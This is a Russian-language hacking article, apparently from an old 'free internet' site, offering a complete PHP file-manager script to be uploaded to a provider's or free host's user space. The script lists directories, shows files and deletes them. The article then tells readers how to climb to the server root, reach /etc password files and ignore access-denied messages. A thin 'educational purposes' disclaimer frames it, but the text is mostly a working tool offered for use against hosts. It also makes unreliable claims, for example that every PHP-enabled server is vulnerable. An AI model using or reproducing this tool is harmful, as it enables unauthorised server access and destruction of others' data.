.:С.П.А.Х.Б.Халява:.Взлом через PHP-скрипт

Вся информация в данном документе предоставлена в образовательных целях. Для того, чтобы показать как плохо защищены пользователи. Авторы не несут никакой ответственности за действия лиц использующих информацию из данной статьи. Если вы не согласны с изложенным выше, то немедленно закройте, а затем удалите данный файл.

Путешествуя по Интернету, мы очень часто наталкивались на мольбы пользователей дать им халявного интернета. Цель данного хелпа – показать как «хакеры» используют различные бреши в продукции компании Майкрософт с целью получения «бесплатного» интеренета, а также научиться защищаться от данного вида атак.

Взлом через PHP-скрипт

Данная атака на сервер проходит со 100% гарантией. Для успешной атаки взломщику необходимо дисковое пространство на сервере размером в 10 Kb (столько весит скрипт) и возможность запустить свой PHP скрипт. Далеко не секрет, что хакеры очень часто проникают в систему используя социнженерию, тоесть изначально подготавливают жертву, чтобы та им доверяла, получают от неё информацию и осуществляют взлом. Поэтому раздобыть на любом сервере небольшое дисковое пространство для хакера не проблема. В крайнем случае можно и купить себе домен на сервере провайдера или любой другой хостинговой компании, которую хакер собирается взломать.

В большей части взлому подвержены бесплатные хостинговые компании и провайдеры, которые при регистрации доступа в интернет дают бесплатное место для размещение домашней странички пользователя с запуском собственных PHP скриптов.

Идея реализации атаки заключается в том, чтобы залезть на жесткий диск провайдера и иметь возможность управлять файлами, тоесть удалять, просматривать, редактировать. Для этого нам придётся написать небольшой скрипт, который получит доступ к ресурсам сервера. Для начала определим какими функциями должен обладать скрипт: заложим в него функции удаления выбранных файлов, скрипт должен уметь просматривать картинки, открывать каталоги, выставлять права доступа к файлам, знать когда файл был создан в системе, когда файл был изменён, к какой группе относится файл и выставлять соответствующую иконку для удобства, переходить из каталога в каталог, указывать полные пути до файлов:

<?php //говорим что это PHP скрипт 
function cmp( $a, $b ) 
//обьявляем функции
{ 
GLOBAL $sort; //сортируем полученные функции 


if( $a->inode == $b->inode ) 
return 0; 

switch( $sort ) 
//объявляем , что по каким функциям будет сортироваться 
{ 
case "size": 

return ($a->size > $b->size) ? -1 : 1; 
case "type": 
return 
strcmp($a->type, $b->type); 
case "view": 
return 
strcmp($a->view, $b->view); 
case "atime": 
return ($a->atime 
> $b->atime) ? -1 : 1; 
case "ctime": 
return ($a->ctime > 
$b->ctime) ? -1 : 1; 
case "mtime": 
return ($a->mtime > 
$b->mtime) ? -1 : 1; 
case "group": 
return strcmp($a->group, 
$b->group); 
case "inode": 
return ($a->inode > $b->inode) ? 
-1 : 1; 
case "owner": 
return strcmp($a->owner, $b->owner); 

case "perms": 
return ($a->perms > $b->perms) ? -1 : 1; 
case 
"ext": 
return strcmp($a->ext, $b->ext); 
case "name": 
default: 

return 1; 
} 
} 

function getIcons( $ext ) //объявляем функцию 
сопоставления иконки с типом файла 
{ 
switch( $ext ) 
{ 
case 
"dir": 
$file = "dir"; 
break; 
case "link": 
$file = "link"; 

break; 
case "zip": 
case "tgz": 
case "gz": 
case "Z": 

$file = "compressed"; 
break; 
case "gif":
case "jpg": 
$file = 
"image2"; 
break; 
case "dvi": 
$file = "dvi"; 
break; 
case "": 

case "exe": 
$file = "binary"; 
break; 
case "sh": 
case "php": 

case "php3": 
case "sql": 
case "inc": 
case "js": 
$file = 
"script"; 
break; 
case "txt":
$file = "text";
break; 
case 
"html": 
case "shtml": 
case "phtml": 
$file = "world1"; 
break; 

default: 
$file = "generic"; 
break; 
} 

return 
$IMG="<IMG SRC='icons/".$file.".gif'>"; 
} 

class MyFile { 
//объявляем какие данные будут получены 
var $name; 
var $path; 
var 
$type; 
var $ext; 
var $stype; 
var $sfile; 
var $size; 
var 
$file; 
var $atime; 
var $ctime; 
var $mtime; 
var $group; 
var 
$inode; 
var $owner; 
var $perms; 

function set( $filename, $path ) 

{ 
GLOBAL $cd; //объявляем функции перехода по каталогам 


$this->name = $filename; 
$this->path = $path; 

$this->file = $this->path."/".$this->name; 

$this->type = 
filetype( $this->file ); 
$this->size = filesize( $this->file ); 

$this->atime = fileatime( $this->file ); 
$this->ctime = 
filectime( $this->file ); 
$this->mtime = filemtime( $this->file ); 

$this->group = filegroup( $this->file ); 
$this->inode = 
fileinode( $this->file ); 
$this->owner = fileowner( $this->file ); 

$this->perms = fileperms( $this->file ); 

switch( 
$this->type ) 
{ 
case "link": 
$this->sfile = readlink( 
$this->file ); 
$this->stype = filetype( $this->sfile ); 

$this->ext = "link"; 
break; 
case "file": 
$list = explode( 
".", $this->name ); 
$nb = sizeof( $list ); 
if( $nb > 0 ) 

$this->stype = $list[$nb-1]; 
else 
$this->stype = "???"; 


$this->ext = $this->stype; 

switch( $this->stype ) 
{ 

case "gif": 
case "GIF": 
case "jpg": 
case "JPG": 
if( isset( 
$cd ) ) 
$pwd = $cd."/"; 
else 
$pwd = ""; 

$this->sfile = 
"<IMG SRC='".$this->file."'>"; 
break; 
default: 

$this->sfile = $this->stype; 
break; 
} 
break;
default: 

$this->stype = ""; 
$this->sfile = ""; 
$this->ext = 
$this->type; 
break; 
} 
} 

function formatSize() 
{ 

return number_format( $this->size, 0, ".", " "); 
} 
} 


function genUrl( $ref, $args, $key = "", $val = "" )

{ 

$valist = ""; 

reset( $args ); 

if( $key != "" ) 
$args[ 
"$key" ] = $val; 

if( !is_array( $args ) ) 
return $ref; 


while( list( $key, $val ) = each( $args ) ) 
{ 
if( $val == "" ) 

continue; 

if( $valist == "" ) 
$valist .= "?"; 
else 

$valist .= "&"; 

$valist .= $key."=".$val; 
} 
return 
$ref.$valist; 
} 

function updir( $path ) 
{ 
$last = strrchr( 
$path, "/" ); 
$n1 = strlen( $last ); 
$n2 = strlen( $path ); 
return 
substr( $path, 0, $n2-$n1 ); 
} 

$ref = "dir.php"; 

if( isset( 
$cd ) ) 
{ 
$path = $cd; 
//$lcd = "?cd=$cd'"; 
$args[ "cd" ] = $cd; 

} 
else 
{ 
$path = "."; 
//$lcd = ""; 
$args[ "cd" ] = ""; 

} 

if( isset( $nb ) ) 
{ 
for( $i = 0; $i < $nb; $i++ ) 

{ 
$var = "id_$i"; 
if( isset( $$var ) )
{ 
$file = 
$path."/".$$var; 
if( is_file( $file ) || is_link( $file ) ) 
{ 
if( 
unlink( $file ) ) 
echo "<BR><b>$file</b> успешно 
удалён\n"; //сообщение об успешном удалении файла 
else 
echo 
"<BR>Не могу удалить выставите права доступа <b>$file</b>\n"; 
//сообщение о невозможности удалить файл который доступен только для чтения 

} 
elseif( is_dir( $file ) ) 
{ 
if( rmdir( $file ) ) 
echo 
"<BR><b>$file</b> успешно удалён\n"; //сообщение об успешном 
удалении 
else 
echo "<BR>файл недоступен для 
удаления<b>$file</b>\n"; //сообщение о невозможности удалить файл 

} 
} 
} 
} 

$step = 100; 

if( !isset( $sort ) ) 

$sort = "name"; 
else 
$args[ "sort" ] = $sort; 

if( !isset( 
$from ) ) 
$from = 0; 
else 
$args[ "from" ] = $from; 

if( 
!isset( $to ) ) 
$to = $from + $step; 

$d = dir($path); 
echo "\n"; 

echo "<br><a href=$ref >Вернуться в начало</a>\n"; 
//ссылка на возврат в домашнею директорию скрипта 
$updir = 
updir($d->path); 
if( $updir != "." ) 
echo "<br>Подняться на 
директорию вверх; <a href=$ref?cd=$updir>$updir</a>\n"; //ссылка на 
директорию вверх 
echo "<br>Открыть директорию: <a 
href=$ref?cd=".$d->path."/..>..</a>\n"; //обновление текущей 
директории 
echo "<br>Текущая директория: 
<b>".$d->path."</b>\n"; //показываем путь до директории и файлов, 
которые в ней находятся 

$n = 0; 
while( $entry=$d->read() ) 
{ 

$lFiles[ $n ] = new MyFile; 
$lFiles[ $n ]->set( $entry, $path ); 

$n++; 
} 

$d->close(); //создаём HTML форму управления 
функциями 
echo "<FORM NAME='del' METHOD='post' ACTION='".genUrl( $ref, 
$args )."'>\n"; 
echo "<TABLE BORDER=1>\n"; 
echo "<TR>\n"; 

echo "<TH>D</TH>\n"; 
//echo "<TH><a href='".genUrl( 
$ref, $args, "sort", "type" )."'>Type</a></TH>\n"; 
echo 
"<TH><a href='".genUrl( $ref, $args, "sort", "name" 
)."'>Имя</a></TH>\n"; 
echo "<TH><a href='".genUrl( 
$ref, $args, "sort", "size" )."'>Размер</a></TH>\n"; 
echo 
"<TH><a href='".genUrl( $ref, $args, "sort", "ext" 
)."'>Класс</a></TH>\n"; 
echo "<TH><a href='".genUrl( 
$ref, $args, "sort", "atime" )."'>В системе</a></TH>\n"; 
echo 
"<TH><a href='".genUrl( $ref, $args, "sort", "ctime" 
)."'>Создан</a></TH>\n"; 
echo "<TH><a 
href='".genUrl( $ref, $args, "sort", "mtime" 
)."'>Изменён</a></TH>\n"; 
echo "<TH><a 
href='".genUrl( $ref, $args, "sort", "perms" 
)."'>Размер</a></TH>\n"; 
echo "<TH><a 
href='".genUrl( $ref, $args, "sort", "group" 
)."'>Группа</a></TH>\n"; 
echo "<TH><a 
href='".genUrl( $ref, $args, "sort", "owner" )."'>ow</a></TH>\n"; 

echo "<TH><a href='".genUrl( $ref, $args, "sort", "inode" 
)."'>in</a></TH>\n"; 
echo "<TH>Показ</TH>\n"; 

echo "</TR>\n"; 

@usort( $lFiles, cmp ); 

for( $i = 0; 
$i < $n; $i++ ) 
{ 
if( ( $i < $from ) || ( $i >= $to ) ) 

continue; 

$k = $i; 
echo "<TR>\n"; 
echo 
"<TD><INPUT TYPE='checkbox' NAME='id_$k' VALUE='". 
$lFiles[ $k 
]->name 
."'></TD>\n"; 

$IMG=getIcons( $lFiles[ $k 
]->ext ); 

$dform = "M j y H:i"; 
// echo "<TD ALIGN=CENTER 
>".$lFiles[ $k ]->type."</TD>\n"; 
echo "<TD>$IMG".$lFiles[ 
$k ]->name."</TD>\n"; 
echo "<TD ALIGN=RIGHT >".$lFiles[ $k 
]->formatSize()."</TD>\n"; 
echo "<TD>".$lFiles[ $k ]->ext 
."</TD>\n"; 
echo "<TD>".date( $dform, $lFiles[ $k ]->atime 
)."</TD>\n"; 
echo "<TD>".date( $dform, $lFiles[ $k ]->ctime 
)."</TD>\n"; 
echo "<TD>".date( $dform, $lFiles[ $k ]->mtime 
)."</TD>\n"; 
echo "<TD>".$lFiles[ $k 
]->perms."</TD>\n"; 
echo "<TD>".$lFiles[ $k 
]->group."</TD>\n"; 
echo "<TD>".$lFiles[ $k 
]->owner."</TD>\n"; 
echo "<TD>".$lFiles[ $k 
]->inode."</TD>\n"; 

switch( $lFiles[ $k ]->type ) 
{ 

case "link": 
if( $lFiles[ $k ]->stype == "dir" ) 
{ 
$tcd = 
$lFiles[ $k ]->path."/".$lFiles[ $k ]->name; 
echo "<TD><a 
href='". 
genUrl( $ref, $args, "cd", $tcd )."'>". 
$lFiles[ $k 
]->sfile."</a></TD>\n"; 
} 
else 
echo 
"<TD>".$lFiles[ $k ]->sfile."</TD>\n"; 
break; 
case 
"dir":
$tcd = $lFiles[ $k ]->path."/".$lFiles[ $k ]->name; 
echo 
"<TD><a href='". 
genUrl( $ref, $args, "cd", $tcd )."'>". 

$lFiles[ $k ]->name."</a></TD>\n"; 
break; 
case 
"file": 
echo "<TD>".$lFiles[ $k ]->sfile."</TD>\n"; 

break; 
default: 
echo "<TD>NO</TD>\n"; 
break; 
} 

echo "</TR>\n"; 
} 

echo "</TABLE>\n"; 

$from = 
$from - $step; 
if( isset( $cd ) ) 
{ 
echo "<INPUT TYPE='hidden' 
NAME='cd' VALUE='$cd'>\n"; 
} 
echo "<INPUT TYPE='hidden' NAME='nb' 
VALUE='$n'>\n"; 

//echo "<br>from=$from;to=$to;n=$n\n"; 
echo 
"<br>\n"; 
if( $from >= 0 ) 
{ 
echo "<a href='". 

genUrl( $ref, $args, "from", $from )."' >Предыдущий</a>/\n"; 
} 

if( $to <= $n ) 
{ 
echo "<a href='". 
genUrl( $ref, $args, 
"from", $to )."' >Далее</a> \n"; 
} 
echo "<br>\n"; 

echo "<INPUT TYPE='submit' VALUE='Del'>\n"; 
echo 
"</FORM>\n"; 
?> //говорим что PHP скрипт кончился

Вот реализация скрипта, который позволяет вам получить доступ в каталоги провайдера, содержащиеся у него на винчестере. Потенциальная опасность применения данного скрипта в том, что злоумышленник получает практически всю информацию о сервере, также злоумышленник получает доступ к папки etc, где хранятся пароли. При проверке работоспособности скрипта и проверке на уязвимости было выявлено, что все сервера, на которых разрешён запуск PHP оказались подвержены данной атаке. Скрипт помещяется на сервер провайдера, где вам разрешен запуск PHP скриптов, в директорию домашней странички. По умолчанию скрипт просматривает все находящиеся файлы в той директории, куда он был загружен для того, чтобы попасть в корневой каталог сервера жмите на ссылку "Подняться на каталог выше" до тех пор, пока вы не увидите корневой каталог сервера. При выходе из вашей директории скрипт возможно сообщит вам о невозможности выйти из вашего каталога, это сообщение сервера игнорируйте и жмите на ссылку "Подняться на каталог вверх", скрипт передаст данные серверу о том, что каталоги которые вы пытаетесь просмотреть являются вашими и вас пропустят.